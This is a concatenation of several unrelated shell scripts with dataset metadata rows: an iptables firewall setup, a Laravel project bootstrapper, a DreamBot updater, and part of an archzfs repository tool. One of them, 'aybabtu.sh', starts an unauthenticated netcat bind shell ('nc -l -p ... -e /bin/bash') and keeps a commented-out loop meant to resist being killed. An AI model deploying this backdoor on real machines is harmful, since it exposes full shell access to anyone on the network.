${IPTABLES} -t filter -A INPUT -s ${shost} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -s ${shost} -j ${DROP}
else
${IPTABLES} -t filter -A INPUT -s ${shost} -d ${dhost} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -s ${shost} -d ${dhost} -j ${DROP}
fi
}
echo -n "${rule} "
done
echo
fi
# Hostwise port denies. Rule grammar appears to be "src>port[-port][<dst]"
# ('>' before the port, '<' before an optional destination, '-' for a port
# range) -- TODO confirm against the config that defines DENY_HOSTWISE_*.
if [ "$DENY_HOSTWISE_TCP" != "" ] ; then
echo -n "Hostwise TCP Denies: "
for rule in ${DENY_HOSTWISE_TCP} ; do
echo "$rule" | {
IFS='><' read shost port dhost
echo "$port" | {
IFS='-' read fsp lsp
if [ "$dhost" == "" ] ; then
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INPUT -p tcp -s ${shost} --dport ${fsp}:${lsp} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p tcp -s ${shost} --dport ${fsp}:${lsp} -j ${DROP}
else
${IPTABLES} -t filter -A INPUT -p tcp -s ${shost} --dport ${port} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p tcp -s ${shost} --dport ${port} -j ${DROP}
fi
else
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INPUT -p tcp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p tcp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j ${DROP}
else
${IPTABLES} -t filter -A INPUT -p tcp -s ${shost} -d ${dhost} --dport ${port} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p tcp -s ${shost} -d ${dhost} --dport ${port} -j ${DROP}
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
# Same grammar and structure as the TCP denies above, for UDP.
if [ "$DENY_HOSTWISE_UDP" != "" ] ; then
echo -n "Hostwise UDP Denies: "
for rule in ${DENY_HOSTWISE_UDP} ; do
echo "$rule" | {
IFS='><' read shost port dhost
echo "$port" | {
IFS='-' read fsp lsp
if [ "$dhost" == "" ] ; then
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INPUT -p udp -s ${shost} --dport ${fsp}:${lsp} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p udp -s ${shost} --dport ${fsp}:${lsp} -j ${DROP}
else
${IPTABLES} -t filter -A INPUT -p udp -s ${shost} --dport ${port} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p udp -s ${shost} --dport ${port} -j ${DROP}
fi
else
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INPUT -p udp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p udp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j ${DROP}
else
${IPTABLES} -t filter -A INPUT -p udp -s ${shost} -d ${dhost} --dport ${port} -j ${DROP}
${IPTABLES} -t filter -A FORWARD -p udp -s ${shost} -d ${dhost} --dport ${port} -j ${DROP}
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
#Invalid packets are always annoying
echo -n "${DROP}ing invalid packets..."
${IPTABLES} -t filter -A INETIN -m state --state INVALID -j ${DROP}
echo "done"
# ------------------------------------------------------------------------
# Internet jumps to INET chains and DMZ
# Set up INET chains: every packet arriving on an internet-facing device
# (or crossing between internet and LAN devices) is routed through the
# INETIN/INETOUT custom chains built earlier.
echo -n "Setting up INET chains: "
for inetdev in ${INET_IFACE} ; do
${IPTABLES} -t filter -A INPUT -i $inetdev -j INETIN
for landev in ${LAN_IFACE} ; do
${IPTABLES} -t filter -A FORWARD -i $inetdev -o $landev -j INETIN
done
echo -n "INETIN "
${IPTABLES} -t filter -A OUTPUT -o $inetdev -j INETOUT
for landev in ${LAN_IFACE} ; do
${IPTABLES} -t filter -A FORWARD -o $inetdev -i $landev -j INETOUT
done
echo -n "INETOUT "
echo
done
# MSS clamping for ISPs/links that break path-MTU discovery (e.g. PPPoE).
if [ "$BRAINDEAD_ISP" = "TRUE" ] ; then
${IPTABLES} -t filter -A INETOUT -p tcp --tcp-flags SYN,RST SYN -j TCPMSS --clamp-mss-to-pmtu
fi
# For now we'll subject the DMZ to the same rules as the internet when going onto the trusted LAN
# And we'll let it go anywhere on the internet
if [ "$DMZ_IFACE" != "" ] ; then
echo -n "Setting up DMZ Chains: "
${IPTABLES} -A OUTPUT -o ${DMZ_IFACE} -j DMZOUT
${IPTABLES} -A FORWARD -i ${LAN_IFACE} -o ${DMZ_IFACE} -j DMZOUT
${IPTABLES} -A FORWARD -i ${INET_IFACE} -o ${DMZ_IFACE} -j ACCEPT
echo -n "DMZOUT "
echo -n "DMZ for Internet Forwarding to INETOUT..."
${IPTABLES} -A DMZOUT -j INETOUT
${IPTABLES} -A INPUT -i ${DMZ_IFACE} -j DMZIN
echo -n "DMZIN "
echo
echo -n "DMZ for LAN and localhost Forwarding to INETIN..."
${IPTABLES} -A FORWARD -i ${DMZ_IFACE} -o ${LAN_IFACE} -j DMZOUT
${IPTABLES} -A FORWARD -i ${DMZ_IFACE} -o ${INET_IFACE} -j ACCEPT
${IPTABLES} -A DMZOUT -o ${LAN_IFACE} -j INETIN
echo "done"
echo -n "done"
fi
# ------------------------------------------------------------------------
# Local traffic to internet or crossing subnets
# This should cover what we need if we don't use masquerading
# Unfortunately, MAC address matching isn't bidirectional (for
# obvious reasons), so IP based matching is done here
echo -n "Local Traffic Rules: "
if [ "$INTERNAL_LAN" != "" ] ; then
for subnet in ${INTERNAL_LAN} ; do
${IPTABLES} -t filter -A INPUT -s ${subnet} -j ACCEPT
# FIX: iptables removed the postfix negation form "-o ! iface" in the
# 1.4.x series; "! -o iface" is the supported spelling.
# NOTE(review): this assumes INET_IFACE holds a single device here,
# even though other sections loop over it -- confirm.
${IPTABLES} -t filter -A FORWARD -s ${subnet} ! -o ${INET_IFACE} ! -i ${INET_IFACE} -j ACCEPT
echo -n "${subnet}:ACCEPT "
done
fi
# 127.0.0.0/8 used to need an entry in INTERNAL_LAN, but routing of that isn't needed
# so an allow is placed on INPUT so that the computer can talk to itself :)
${IPTABLES} -t filter -A INPUT -i ${LOOP_IFACE} -j ACCEPT
echo -n "loopback:ACCEPT "
# DHCP server magic
# Allow broadcasts from LAN to UDP port 67 (DHCP server)
if [ "$DHCP_SERVER" = "TRUE" ] ; then
for dev in ${LAN_IFACE} ; do
${IPTABLES} -t filter -A INPUT -i $dev -p udp --dport 67 -j ACCEPT
done
echo -n "dhcp:ACCEPT"
fi
echo #newline from local traffic rules
# Transparent proxy: PROXY is "host:port". A local proxy uses REDIRECT;
# a remote one uses DNAT plus SNAT so replies route back through us.
if [ "$PROXY" != "" ] ; then
echo -n "Setting up Transparent Proxy to ${PROXY}: "
for subnet in ${INTERNAL_LAN} ; do
echo "$PROXY" | {
IFS=':' read host port
if [ "$host" = "localhost" ] || [ "$host" = "127.0.0.1" ] ; then
${IPTABLES} -t nat -A PREROUTING -s ${subnet} -p tcp --dport 80 -j REDIRECT --to-port ${port}
echo -n "${subnet}:PROXY "
else
# FIX: "-s ! host" -> "! -s host" (postfix negation no longer accepted).
${IPTABLES} -t nat -A PREROUTING ! -s ${host} -p tcp --dport 80 -j DNAT --to-destination ${host}:${port}
${IPTABLES} -t nat -A POSTROUTING -s ${subnet} -d ${host} -j SNAT --to-source ${MY_IP} #Destination changed in PREROUTING
echo -n "${subnet}:PROXY "
fi
}
done
echo
fi
# Egress whitelist: rules are "internalIP:destIP:destPort".
if [ "$ALLOW_OUT_TCP" != "" ] ; then
echo -n "Internet censorship TCP allows: "
for rule in ${ALLOW_OUT_TCP} ; do
echo "$rule" | {
IFS=':' read intip destip dport
${IPTABLES} -t filter -A FORWARD -s ${intip} -d ${destip} -p tcp --dport ${dport} -o ${INET_IFACE} -j ACCEPT
echo -n "${intip}:${destip} "
}
done
echo
fi
# Set up basic NAT if the user wants it
# MASQ_LAN masquerades by source subnet unless MAC_MASQ is set, in which
# case only the listed MAC addresses are masqueraded.
if [ "$MASQ_LAN" != "" ] ; then
echo -n "Setting up masquerading: "
if [ "$MAC_MASQ" = "" ] ; then
for subnet in ${MASQ_LAN} ; do
${IPTABLES} -t nat -A POSTROUTING -s ${subnet} -o ${INET_IFACE} -j MASQUERADE
echo -n "${subnet}:MASQUERADE "
done
else
for address in ${MAC_MASQ} ; do
${IPTABLES} -t nat -A POSTROUTING -m mac --mac-source ${address} -o ${INET_IFACE} -j MASQUERADE
echo -n "${address}:MASQUERADE "
done
fi
echo
fi
# Static NAT: rules are "host:externalIP" (or "mac:externalIP" via MAC_SNAT).
if [ "$SNAT_LAN" != "" ] ; then #Static NAT used
echo -n "Setting up static NAT: "
if [ "$MAC_SNAT" = "" ] ; then
for rule in ${SNAT_LAN} ; do
echo "$rule" | {
IFS=':' read host destip
${IPTABLES} -t nat -A POSTROUTING -s ${host} -o ${INET_IFACE} -j SNAT --to-source ${destip}
echo -n "${host}:SNAT "
}
done
else
for rule in ${MAC_SNAT} ; do
echo "$rule" | {
IFS=':' read address destip
${IPTABLES} -t nat -A POSTROUTING -m mac --mac-source ${address} -o ${INET_IFACE} -j SNAT --to-source ${destip}
echo -n "${address}:SNAT "
}
done
fi
echo
fi
#TCP Port-Forwards
# Rule grammar appears to be "srcport[-srcport]:destport>host[<listenIP]"
# -- TODO confirm against the config that defines TCP_FW/UDP_FW.
# Note: the inner fdp/ldp parse of destport is never used; the whole
# "a-b" destport string is passed to --to-destination, which iptables
# accepts as a port range directly.
if [ "$TCP_FW" != "" ] ; then
echo -n "TCP Port Forwards: "
for rule in ${TCP_FW} ; do
echo "$rule" | {
IFS=':><' read srcport destport host shost
echo "$srcport" | {
IFS='-' read fsp lsp
if [ "$shost" = "" ] ; then
if [ "$lsp" != "" ] ; then
echo "$destport" | {
IFS='-' read fdp ldp
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p tcp --dport ${fsp}:${lsp} -j DNAT --to-destination ${host}:${destport}
}
else
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p tcp --dport ${srcport} -j DNAT --to-destination ${host}:${destport}
fi
else
if [ "$lsp" != "" ] ; then
echo "$destport" | {
IFS='-' read fdp ldp
${IPTABLES} -t nat -A PREROUTING -p tcp -d ${shost} --dport ${fsp}:${lsp} -j DNAT --to-destination ${host}:${destport}
}
else
${IPTABLES} -t nat -A PREROUTING -p tcp -d ${shost} --dport ${srcport} -j DNAT --to-destination ${host}:${destport}
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
#UDP Port Forwards -- identical structure to the TCP forwards above.
if [ "$UDP_FW" != "" ] ; then
echo -n "UDP Port Forwards: "
for rule in ${UDP_FW} ; do
echo "$rule" | {
IFS=':><' read srcport destport host shost
echo "$srcport" | {
IFS='-' read fsp lsp
if [ "$shost" = "" ] ; then
if [ "$lsp" != "" ] ; then
echo "$destport" | {
IFS='-' read fdp ldp
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p udp --dport ${fsp}:${lsp} -j DNAT --to-destination ${host}:${destport}
}
else
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p udp --dport ${srcport} -j DNAT --to-destination ${host}:${destport}
fi
else
if [ "$lsp" != "" ] ; then
echo "$destport" | {
IFS='-' read fdp ldp
${IPTABLES} -t nat -A PREROUTING -p udp -d ${shost} --dport ${fsp}:${lsp} -j DNAT --to-destination ${host}:${destport}
}
else
${IPTABLES} -t nat -A PREROUTING -p udp -d ${shost} --dport ${srcport} -j DNAT --to-destination ${host}:${destport}
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
# =================================================
# -------------------ICMP rules--------------------
# =================================================
# Drop the administratively blacklisted ICMP message types first.
if [ "$BAD_ICMP" != "" ] ; then
echo -n "${DROP}ing ICMP messages specified in BAD_ICMP..."
for message in ${BAD_ICMP} ; do
${IPTABLES} -t filter -A INETIN -p icmp --icmp-type ${message} -j ${DROP}
echo -n "${message} "
done
echo
fi
# Flood "security"
# You'll still respond to these if they comply with the limits (set in config)
# There is a more elegant way to set this using sysctl, however this has the
# advantage that the kernel ICMP stack never has to process it, lessening
# the chance of a very serious flood overloading your kernel.
# This is just a packet limit, you still get the packets on the interface and
# still may experience lag if the flood is heavy enough
echo -n "Flood limiting: "
# Ping Floods (ICMP echo-request)
${IPTABLES} -t filter -A INETIN -p icmp --icmp-type echo-request -m limit --limit ${PING_FLOOD} -j ACCEPT
${IPTABLES} -t filter -A INETIN -p icmp --icmp-type echo-request -j ${DROP}
echo -n "ICMP-PING "
echo
echo -n "Allowing the rest of the ICMP messages in..."
# FIX: "--icmp-type ! echo-request" used the postfix negation syntax that
# iptables 1.4.x removed; "! --icmp-type" is the supported form.
${IPTABLES} -t filter -A INETIN -p icmp ! --icmp-type echo-request -j ACCEPT
echo "done"
# ================================================================
# ------------Allow stuff we have chosen to allow in--------------
# ================================================================
# Hostwise allows -- same "src>port[-port][<dst]" grammar as the denies;
# accepted traffic is routed through TCPACCEPT/UDPACCEPT for flood limits.
if [ "$ALLOW_HOSTWISE_TCP" != "" ] ; then
echo -n "Hostwise TCP Allows: "
for rule in ${ALLOW_HOSTWISE_TCP} ; do
echo "$rule" | {
IFS='><' read shost port dhost
echo "$port" | {
IFS='-' read fsp lsp
if [ "$dhost" == "" ] ; then
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INETIN -p tcp -s ${shost} --dport ${fsp}:${lsp} -j TCPACCEPT
else
${IPTABLES} -t filter -A INETIN -p tcp -s ${shost} --dport ${port} -j TCPACCEPT
fi
else
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INETIN -p tcp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j TCPACCEPT
else
${IPTABLES} -t filter -A INETIN -p tcp -s ${shost} -d ${dhost} --dport ${port} -j TCPACCEPT
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
if [ "$ALLOW_HOSTWISE_UDP" != "" ] ; then
echo -n "Hostwise UDP Allows: "
for rule in ${ALLOW_HOSTWISE_UDP} ; do
echo "$rule" | {
IFS='><' read shost port dhost
echo "$port" | {
IFS='-' read fsp lsp
if [ "$dhost" == "" ] ; then
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INETIN -p udp -s ${shost} --dport ${fsp}:${lsp} -j UDPACCEPT
else
${IPTABLES} -t filter -A INETIN -p udp -s ${shost} --dport ${port} -j UDPACCEPT
fi
else
if [ "$lsp" != "" ] ; then
${IPTABLES} -t filter -A INETIN -p udp -s ${shost} -d ${dhost} --dport ${fsp}:${lsp} -j UDPACCEPT
else
${IPTABLES} -t filter -A INETIN -p udp -s ${shost} -d ${dhost} --dport ${port} -j UDPACCEPT
fi
fi
echo -n "${rule} "
}
}
done
echo
fi
# Raw IP-protocol allows: rules are "src>protocol[<dst]".
if [ "$ALLOW_HOSTWISE_PROTO" != "" ] ; then
echo -n "Hostwise IP Protocol Allows: "
for rule in ${ALLOW_HOSTWISE_PROTO} ; do
echo "$rule" | {
IFS='><' read shost proto dhost
if [ "$dhost" == "" ] ; then
${IPTABLES} -t filter -A INETIN -p ${proto} -s ${shost} -j ACCEPT
else
${IPTABLES} -t filter -A INETIN -p ${proto} -s ${shost} -d ${dhost} -j ACCEPT
fi
echo -n "${rule} "
}
done
echo
fi
echo -n "Allowing established outbound connections back in..."
${IPTABLES} -t filter -A INETIN -m state --state ESTABLISHED -j ACCEPT
echo "done"
# RELATED on high ports only for security
echo -n "Allowing related inbound connections..."
${IPTABLES} -t filter -A INETIN -p tcp --dport 1024:65535 -m state --state RELATED -j TCPACCEPT
${IPTABLES} -t filter -A INETIN -p udp --dport 1024:65535 -m state --state RELATED -j UDPACCEPT
echo "done"
# =================================================
# ----------------Packet Mangling------------------
# =================================================
# TTL mangling
# This is probably just for the paranoid, but hey, isn't that what
# all security guys are? :)
if [ "$TTL_SAFE" != "" ] ; then
${IPTABLES} -t mangle -A PREROUTING -i ${INET_IFACE} -j TTL --ttl-set ${TTL_SAFE}
fi
# Type of Service mangle optimizations (the ACTIVE FTP one will only work for uploads)
# Most routers tend to ignore these, it's probably better to use
# QoS. A packet scheduler like HTB is much more efficient
# at assuring bandwidth availability at the local end than
# ToS is.
if [ "$MANGLE_TOS_OPTIMIZE" = "TRUE" ] ; then
echo -n "Optimizing traffic: "
${IPTABLES} -t mangle -A OUTPUT -p tcp --dport 23 -j TOS --set-tos Minimize-Delay
echo -n "telnet "
${IPTABLES} -t mangle -A OUTPUT -p tcp --dport 22 -j TOS --set-tos Minimize-Delay
echo -n "ssh "
${IPTABLES} -t mangle -A OUTPUT -p tcp --dport 20 -j TOS --set-tos Minimize-Cost
echo -n "ftp-data "
${IPTABLES} -t mangle -A OUTPUT -p tcp --dport 21 -j TOS --set-tos Minimize-Delay
echo -n "ftp-control "
${IPTABLES} -t mangle -A OUTPUT -p udp --dport 4000:7000 -j TOS --set-tos Minimize-Delay
echo -n "diablo2 "
echo
fi
# What to do on those INET chains when we hit the end
echo -n "Setting up INET policies: "
# Drop if we cant find a valid inbound rule.
${IPTABLES} -t filter -A INETIN -j ${DROP}
echo -n "INETIN:${DROP} "
# We can send what we want to the internet
${IPTABLES} -t filter -A INETOUT -j ACCEPT
echo -n "INETOUT:ACCEPT "
echo
# All done!
echo "Done loading the firewall!"
# Inbound VPN forwarding to the internal VPN server (hard-coded 192.168.0.8):
# PPTP control channel (1723/tcp) plus GRE (IP protocol 47).
${IPTABLES} -t nat -A PREROUTING -i $INET_IFACE -p tcp --dport 1723 -j DNAT --to 192.168.0.8
${IPTABLES} -t nat -A PREROUTING -i $INET_IFACE -p 47 -j DNAT --to 192.168.0.8
# IPsec: IKE on 500/udp, ESP (proto 50) and AH (proto 51).
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p udp --dport 500 -j DNAT --to 192.168.0.8
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p 50 -j DNAT --to 192.168.0.8
${IPTABLES} -t nat -A PREROUTING -i ${INET_IFACE} -p 51 -j DNAT --to 192.168.0.8
echo "Now it is really done,have fun!"
| true
|
a809ffbf682beb1c18b1010fee1e700f2ae448fe
|
Shell
|
ildac/jumpStartLaravel
|
/jumpStartLaravel.sh
|
UTF-8
| 4,683
| 4.5
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# jumpStartLaravel.sh
# An interactive script that does for you the most common operation when setting up a new Laravel project.
# The requirements to run the script are:
# - composer
# - git
# - curl
# - homestead
# Usage:
# jumpStartLaravel.sh -gih -o http://git.your.repo/address -l homestead <projectName>
# Options:
# - -g: initialize the git repository
# - -o: to set the remote repo address (without this no remote repository will be set)
# - -i: download the .gitignore file in the directory
# - -h: add a new site in the Homestead configuration
# - -l <localMachineName>: setup the laravel local environment, by default localMachineName is set to "homestead" that is the default one
#
# Created by ilDac on 27/09/14.
# Updated by ilDac on 30/09/14.
#
# BUG FIX: the shebang was /bin/sh, but the script uses bash-only features
# ("==" inside [ ], the ${@: -1} expansion), so it broke on systems where
# sh is dash/ash. It now runs under bash explicitly.
# initialization -- flags default to "no" until getopts flips them
initializeGitRepo="no"
externalRepoAddress="no"
setupGitIgnore="no"
addSiteToHomesteadConfig="no"
localEvironment="no"
localMachineName="homestead"
#if no project name is specified, composer will use the default project name "laravel"
while getopts "gihl:o:" flag
do
case $flag in
g)
initializeGitRepo="yes"
;;
o)
externalRepoAddress="yes"
originRepoAddress=$OPTARG
;;
i)
setupGitIgnore="yes"
;;
h)
addSiteToHomesteadConfig="yes"
;;
l)
localEvironment="yes"
# getopts "l:" always supplies OPTARG, but keep the guard harmlessly.
if [ "$OPTARG" != "" ]; then
localMachineName=$OPTARG
fi
;;
\?)
echo "Invalid option: -$OPTARG" >&2
exit 1
;;
esac
done
#project name is always the last argument passed to the script
projectName="${@: -1}"
#create the new project with composer (quoted so names with spaces survive)
echo "Initializating the project via Composer"
composer create-project laravel/laravel "$projectName"
# BUG FIX: abort if the project directory was not created; everything
# below would otherwise run in the wrong directory.
cd "$projectName" || exit 1
#configure permissions on folder
# NOTE(review): 0777 is world-writable; Laravel only needs write access
# for the web-server user -- consider tightening.
echo "Granting write permissions to app/storage"
chmod -R 0777 app/storage
#setup a local environment?
if [ "$localEvironment" == "yes" ] || [ "$localEvironment" == "y" ]; then
echo "Setting up Laravel local environment"
if [ "$localMachineName" != "homestead" ] && [ "$localMachineName" != "" ]; then
find bootstrap -name 'start.php' -exec sed -i '' -e 's/homestead/'"$localMachineName"'/g' {} \;
echo "Local environment name set to $localMachineName"
fi
fi
#git initialization
if [ "$initializeGitRepo" == "yes" ] || [ "$initializeGitRepo" == "y" ]; then
git init
echo "Git repository initialized in the project root"
#add external repository for the project (like bitbucket or github)?
if [ "$externalRepoAddress" == "yes" ] || [ "$externalRepoAddress" == "y" ]; then
git remote add origin "$originRepoAddress"
echo "Added remote repository origin: $originRepoAddress"
fi
#.gitignore autodownload from github download .gitingnore from here:
if [ "$setupGitIgnore" == "yes" ] || [ "$setupGitIgnore" == "y" ]; then
echo "Downloading the .gitignore from the official Laravel repository"
curl -o .gitignore https://raw.githubusercontent.com/laravel/laravel/master/.gitignore;
echo ".gitignore added in your project root"
fi
fi
#setup homestead machine for the new site
if [ "$addSiteToHomesteadConfig" == "yes" ] || [ "$addSiteToHomesteadConfig" == "y" ]; then
#TODO: i can read also the configuration to get the root path and add the one of the project...
#ask for the path to your homestead Folder...
echo "Enter the location of your Homestead root folder: [default: ../../]"
echo "Just the path to the folder do not enter the folder name (Homestead)"
read -r homesteadRootPath;
if [ "$homesteadRootPath" == "" ]; then
homesteadRootPath="../../"
fi
#ask for the local address to use
echo "Enter the local address to use (i.e.: example.loc): "
read -r mapLocalAddress;
#ask for the vagrant path to map this local address
echo "Enter the path that has to be mapped to this address: "
read -r toPath;
#this add the site to the conf, it can be done in a more elegant way, but this works...
# BUG FIX: guard the cd so a bad path doesn't rename files elsewhere.
cd "$homesteadRootPath"/Homestead || exit 1
mv Homestead.yaml homestead.bk
sed '/^'sites'/,/^[{space,tab}]*$/{ # [{space,tab}]
/'sites:'/ {
a\
\ - map: '"$mapLocalAddress"'
a\
\ to: '"$toPath"'
}
}' <homestead.bk > Homestead.yaml
rm homestead.bk
echo "Site added to the Homestead configuration"
#add the local address to the /etc/hosts file
echo "Adding the local address to your /etc/hosts file (can require the sudo password)"
sudo -- sh -c "echo 127.0.0.1 $mapLocalAddress >> /etc/hosts";
echo "/etc/hosts updated with $mapLocalAddress"
else
echo "No Homestead site setup";
fi
echo "Done. What are you waiting for...start working!"
| true
|
fe9be2e0a893e3fccb0ac608b5dfae2f6432674f
|
Shell
|
Nik-Novak/OSBotFarm
|
/game-client/docker/internal-scripts/scripts/check-update.sh
|
UTF-8
| 435
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
# Fetch the latest DreamBot launcher and install it under $BASEDIR/DreamBot
# if it differs from the currently installed copy.
cd "$BASEDIR" || exit 1
echo "Checking for DreamBot updates..."
(cd /tmp && curl -L https://dreambot.org/DBLauncher.jar -O) || exit 1
# BUG FIX: the original test was `[ $(cmp a b) ]`. When the files differ,
# cmp prints a multi-word "files ... differ" message, which word-splits
# inside [ ] into a broken expression that evaluates false -- so the update
# branch could never run. `cmp -s` compares silently and returns non-zero
# when the files differ (or the installed copy is missing), which is
# exactly the "needs update" condition.
if ! cmp -s /tmp/DBLauncher.jar DreamBot/DBLauncher.jar
then
echo "DreamBot was out of date, updating..."
mv /tmp/DBLauncher.jar DreamBot/DBLauncher.jar
chmod +x DreamBot/DBLauncher.jar
echo "DreamBot updated successfully!"
else
rm /tmp/DBLauncher.jar
echo "DreamBot was already up-to-date."
fi
| true
|
11458d7d5e27e135e76b9aa5d8912644533fc713
|
Shell
|
nineten/aybabtu
|
/aybabtu.sh
|
UTF-8
| 592
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# !! SECURITY WARNING (review note) !!
# This script starts an UNAUTHENTICATED BIND SHELL: anyone who can reach
# the chosen TCP port gets a root-or-user /bin/bash. This is backdoor/
# malware-style tooling -- it should not run on any machine you care about.
# Left functionally untouched; annotations only.
# Guard: if a netcat bound to /bin/bash already shows up in the process
# list, assume we are already running. NOTE(review): the grep pattern
# "-e /bin/bash" starts with a dash and may be parsed as grep options
# rather than a literal pattern -- verify; pgrep -f would be safer.
if ps -ef | grep nc | grep "-e /bin/bash" ; then
echo "aybabtu already running"
exit 0
else
echo "starting aybabtu"
# Print this host's IPv4 address (macOS-style ifconfig/sysctl paths below).
/sbin/ifconfig en1 | grep 'inet ' | cut -d' ' -f2
# Read the ephemeral port range from the BSD sysctl; only lowerPort is used.
read lowerPort upperPort <<< $(/usr/sbin/sysctl net.inet.ip.portrange.first net.inet.ip.portrange.last | cut -d':' -f2 | cut -d' ' -f2)
echo $lowerPort
# Bind shell: listen on the first ephemeral port, attach bash to the socket.
/usr/local/bin/nc -l -p $lowerPort -e /bin/bash &
exit 0
fi
#this loop is interesting. makes it hard to kill the processes
#while :; do
#for (( port = lowerPort ; port <= upperPort ; port++ )); do
#nc -l -p "$port" -e /bin/bash && break
#done
#done
| true
|
01b54db2c352e16071da3bf699f4ab71c4966dc5
|
Shell
|
archzfs/archzfs
|
/repo.sh
|
UTF-8
| 16,818
| 4.375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# repo.sh adds the archzfs packages to the archzfs repository or archzfs-testing repository
#
args=("$@")
script_name=$(basename $0)
script_dir="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
repo_name="" # The destination repo for the packages
package_list=() # A list of packages to add. Array items are in the form of "name;pkg.tar.xz;repo_path".
package_src_list=() # A list of package sources to move
package_exist_list=() # Already-published package files to move into the backup dir before adding new ones
all_added_pkgs=() # A list of all packages, that were added to the repo
haz_error=0 # Set non-zero by lib.sh helpers on failure; checked at end of script
# lib.sh provides msg/debug/run_cmd* helpers; abort hard if it is missing.
if ! source ${script_dir}/lib.sh; then
    echo "!! ERROR !! -- Could not load lib.sh!"
    exit 155
fi
source_safe "${script_dir}/conf.sh"
# Print the help/usage text (built partly from the generated ${mode_list})
# and exit with the script's generic error status 155.
usage() {
    echo "${script_name} - Adds the compiled packages to the archzfs repo."
    echo
    echo "Usage: ${script_name} [options] (mode) (repo)"
    echo
    echo "Options:"
    echo
    echo "    -h:    Show help information."
    echo "    -n:    Dryrun; Output commands, but don't do anything."
    echo "    -d:    Show debug info."
    echo "    -s:    Sign packages only."
    echo "    -p:    Do not sync from remote repo."
    echo "    -r:    Remove the given packages"
    echo
    echo "Modes:"
    echo
    # mode_list entries are colon-separated; field 2 is the name, field 3 the
    # description. Pad short names with an extra tab so columns line up.
    for ml in "${mode_list[@]}"; do
        mn=$(echo ${ml} | cut -f2 -d:)
        md=$(echo ${ml} | cut -f3 -d:)
        if [[ ${#mn} -gt 3 ]]; then
            echo -e "    ${mn}\t   ${md}"
        else
            echo -e "    ${mn}\t\t   ${md}"
        fi
    done
    echo "    all        Select and use all available packages"
    echo
    echo "Repository target:"
    echo
    echo "    azfs        Use the archzfs repo. Used by default."
    echo "    test        Use the archzfs-testing repo."
    echo "    ccm         Install packages to the clean-chroot-manager's repo. Useful incase the chroot neeeds to be nuked."
    echo "    repo=<repo> Install packages to a custom repo."
    echo
    echo "Example Usage:"
    echo
    echo "    ${script_name} lts azfs -n -d    :: Show output commands and debug info."
    exit 155
}
# Populate ${mode_list} (from lib.sh) before parsing command line arguments.
generate_mode_list
if [[ $# -lt 1 ]]; then
    usage
fi
# Walk the positional arguments: repo selectors and flags are recognized
# explicitly; after -r any remaining arg is a package name to remove,
# otherwise it is validated as a build mode via check_mode.
for (( a = 0; a < $#; a++ )); do
    if [[ ${args[$a]} == "azfs" ]]; then
        repo_name=${repo_basename}
        pull_remote_repo=1
    elif [[ ${args[$a]} == "test" ]]; then
        repo_name="${repo_basename}-testing"
        pull_remote_testing_repo=1
    elif [[ ${args[$a]} =~ repo=(.*) ]]; then
        repo_name=${BASH_REMATCH[1]}
    elif [[ ${args[$a]} == "ccm" ]]; then
        repo_name="clean-chroot-manager"
    elif [[ ${args[$a]} == "-s" ]]; then
        sign_packages=1
    elif [[ ${args[$a]} == "-p" ]]; then
        no_pull_remote=1
    elif [[ ${args[$a]} == "-r" ]]; then
        remove_packages=1
    elif [[ ${args[$a]} == "-n" ]]; then
        dry_run=1
    elif [[ ${args[$a]} == "-d" ]]; then
        debug_flag=1
    elif [[ ${args[$a]} == "-h" ]]; then
        usage
    elif [[ ${remove_packages} -eq 1 ]]; then
        modes+=("${args[$a]}")
    else
        check_mode "${args[$a]}"
        debug "have modes '${modes[*]}'"
    fi
done
# Replaced packages are archived here rather than deleted.
package_backup_dir="${repo_basepath}/archive_${repo_name}"
if [[ $# -lt 1 ]]; then
    usage
fi
if [[ ${#modes[@]} -eq 0 ]]; then
    echo
    error "A mode must be selected!"
    usage
fi
if [[ ${repo_name} == "" ]]; then
    error "No destination repo specified!"
    exit 155
fi
# rsync the published repo from the remote host into ${repo_basepath} so the
# local copy is current before packages are added. Honors ${dry_run} by
# passing -n to rsync. Non-fatal failures are recorded via run_cmd_check.
pull_repo() {
    msg "Downloading remote repo..."
    if [[ ${dry_run} -eq 1 ]]; then
        dry="-n"
    fi
    run_cmd "mkdir -p ${repo_basepath}/archive_${repo_basename}"
    run_cmd "rsync -vrtlh --delete-before ${remote_login}:${repo_remote_basepath}/${repo_name} ${repo_basepath}/ ${dry}"
    run_cmd_check 1 "Could not pull packages from remote repo!"
}
# Same as pull_repo, but syncs the "-testing" repo from the remote host.
pull_testing_repo() {
    msg "Downloading remote testing repo..."
